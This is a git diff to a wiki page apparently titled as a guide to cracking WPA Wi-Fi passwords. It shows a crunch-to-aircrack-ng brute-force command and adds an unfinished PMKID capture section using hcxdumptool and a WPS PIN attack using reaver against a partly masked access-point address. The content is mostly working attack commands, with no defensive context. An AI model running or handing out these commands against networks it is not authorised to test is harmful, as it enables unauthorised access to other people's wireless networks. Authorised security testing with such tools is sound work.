diff --git a/HowtoCrackWPA.page b/HowtoCrackWPA.page index 9d4701f..e380e1b 100644 --- a/HowtoCrackWPA.page +++ b/HowtoCrackWPA.page @@ -42,4 +42,20 @@ crunch 8 8 0123456789 -s 00000000 | aircrack-ng -w - -b 00:23:B1:82:08:xx \ No newline at end of file +PSK Generator: + +## PMKID method + +``` +hcxdumptool -i wlanX -o PMKID --enable_status=1 +``` + +TODO... + +## WPS method + +AP must have WPS enabled with a PIN. Not PBC, push button. + +``` +reaver -i wlanX -b 00:23:B1:82:84:xx +``` \ No newline at end of file